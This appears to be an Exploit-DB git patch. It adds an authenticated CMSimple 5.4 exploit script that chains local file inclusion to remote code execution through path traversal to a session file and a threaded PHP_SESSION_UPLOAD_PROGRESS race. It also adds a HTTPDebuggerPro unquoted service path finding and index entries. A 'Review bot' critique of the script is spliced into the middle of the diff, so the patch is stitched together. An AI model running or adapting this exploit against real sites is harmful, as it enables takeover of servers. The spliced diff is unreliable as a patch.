From 268efc5072a142b6445393377df3b04e4f18162d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 25 Nov 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-11-25

3 changes to exploits/shellcodes
HTTPDebuggerPro 9.11 - Unquoted Service Path
CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
---
 exploits/php/webapps/50129.py | 1 +
 exploits/php/webapps/50547.py | 87 ++++++++++++++++++++++++++++++++
 exploits/windows/local/50545.txt | 18 +++++++
 files_exploits.csv | 2 +
 4 files changed, 108 insertions(+)
 create mode 100755 exploits/php/webapps/50547.py
 create mode 100644 exploits/windows/local/50545.txt

diff --git a/exploits/php/webapps/50129.py b/exploits/php/webapps/50129.py
index ac224d9b0..3c029a43b 100755
--- a/exploits/php/webapps/50129.py
+++ b/exploits/php/webapps/50129.py
@@ -5,6 +5,7 @@
 # Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
 # Version: 5.3.2 or below
 # Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
+# CVE: CVE-2021-42362
 # Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
 # Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
 # enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
diff --git a/exploits/php/webapps/50547.py b/exploits/php/webapps/50547.py
new file mode 100755
index 000000000..f347ae14a
--- /dev/null
+++ b/exploits/php/webapps/50547.py
@@ -0,0 +1,87 @@ +# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated) +# Date: 11/15/2021 +# Exploit Author: S1lv3r +# Vendor Homepage: https://www.cmsimple.org/en/ +# Software Link: https://www.cmsimple.org/en/ +# Version: CMSimple 5.4 +# Tested on: CMSimple 5.4 + +# writeup: +# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities + +#!/usr/bin/python3 +import requests +import threading +import datetime +import sys +from bs4 import BeautifulSoup + + +x = datetime.datetime.now() +addSeconds = datetime.timedelta(0, 10) +Time = x + addSeconds + +proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",} +def Login(): + try: + global Time + s = requests.Session() + headers= {"Content-Type": "application/x-www-form-urlencoded"} + + data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login' + + response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies + if response.cookies['passwd']: + print("(+) Sucessfully Logged In With " + User + ":" + Password) + + cookies = response.cookies + params = (('file', 'config'),('action', 'array'),) + response = s.get(RHOST ,cookies=cookies ,params=params,verify=False) + soup = BeautifulSoup(response.text, 'lxml') + CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value'] + print("(+) Get CSRF Token : [ " + CsrfValue + " ]") + data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save' + response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False) + print("(+) Changing Functions file Done ") + print("(+) Check Your nc listner on " + LPORT) + except Exception as error: + print("Error, Exiting;( ") + print(error) + pass +def fuzz(): + while True: + 
try: + sessionName = "S1lv3r" + cookies = {'PHPSESSID': sessionName} + files = {'PHP_SESSION_UPLOAD_PROGRESS':(None, + ''), + 'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')} + x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies + except Exception as error: + print(error) + exit() +def main(): + print("\n(+) CMSimple LFI to RCE \n") + Login() + threads = [] + for _ in range(20): + t = threading.Thread(target=fuzz) + t.start() + threads.append(t) + for thread in threads: + thread.join + +if __name__ == "__main__": + + if len(sys.argv) <= 5: + print("\n(-) Usage: {} ".format(sys.argv[0])) + print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) + print("\n(=) SiLvEr \n") + exit() + else: + RHOST = sys.argv[1] + LHOST = sys.argv[2] + LPORT = sys.argv[3] + User = sys.argv[4] + Password = sys.argv[5] + main()
\ No newline at end of file
diff --git a/exploits/windows/local/50545.txt b/exploits/windows/local/50545.txt
new file mode 100644
index 000000000..aed9b651a
--- /dev/null
+++ b/exploits/windows/local/50545.txt
@@ -0,0 +1,18 @@
+# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path
+# Exploit Author: Aryan Chehreghani
+# Date: 23/11/2021
+# Vendor Homepage: https://www.httpdebugger.com
+# Software Link: https://www.httpdebugger.com/download.html
+# Version: 9.11
+# Tested on: Windows 10 x64
+
+SERVICE_NAME: HTTPDebuggerPro
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : HTTP Debugger Pro
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 608068c5d..0de94ec98 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
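Review bot: In `main()` the loop `for thread in threads: thread.join` only evaluates the bound method and never calls it, so the join is a no-op; it should read `thread.join()`. In the same hunk, `Login()`'s handler prints "Error, Exiting;( " but then falls through with `pass`, so a failed login (for example the `KeyError` raised when `response.cookies['passwd']` is absent) still lets `main()` spawn its twenty `while True` workers, and the `exit()` inside `fuzz()` raises `SystemExit` only in that worker thread rather than stopping the program. The usage message also lists no arguments although five positional ones are required, `LHOST` is parsed but never used, and the `#!/usr/bin/python3` shebang sits below the comment header where the loader will not see it. The `'lxml'` parser handed to BeautifulSoup is a third-party dependency not mentioned in the header alongside `requests` and `bs4`.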
@@ -11420,6 +11420,7 @@ id,file,description,date,author,type,platform,port
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
+50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44638,3 +44639,4 @@ id,file,description,date,author,type,platform,port
 50542,exploits/multiple/webapps/50542.txt,"Webrun 3.6.0.42 - 'P_0' SQL Injection",1970-01-01,"Vinicius Alves",webapps,multiple,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",1970-01-01,"Abhijeet Singh",webapps,php,
 50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,
+50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php,